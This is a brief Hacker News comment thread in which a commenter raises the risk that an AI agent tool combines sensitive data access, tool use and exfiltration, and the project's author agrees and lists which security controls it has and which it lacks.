| ▲ | diffeomorphism 3 days ago | |
The post title should probably start with "Show HN:". What kind of security guarantees do you have? It seems to meet that your "problem" usually is unanswered on purpose: https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/ This has access to sensitive knowledge, tool use and exfiltration. So, the tech seems nice, but I doubt I could ever get permission to deploy this. | ||
| ▲ | achushankar 2 days ago | parent [-] | |
Excellent point about the security concerns. You're right that the combination of: - Sensitive knowledge access - Tool use/actions - Potential exfiltration Is a serious concern, especially in enterprise environments. Currently, this has: - Row-level security in Supabase - API key auth - Rate limiting But it does NOT have: - Comprehensive audit logging - Fine-grained permission controls - Tool execution sandboxing - Data loss prevention You're right that this shouldn't be deployed in production with sensitive data without significant security hardening. I should have been clearer about that. Thanks for the link to Simon's article - very relevant. This is more suited for learning/experimentation than production use with sensitive data right now. If anyone wants to work on security features, I'd be happy to collaborate on that! | ||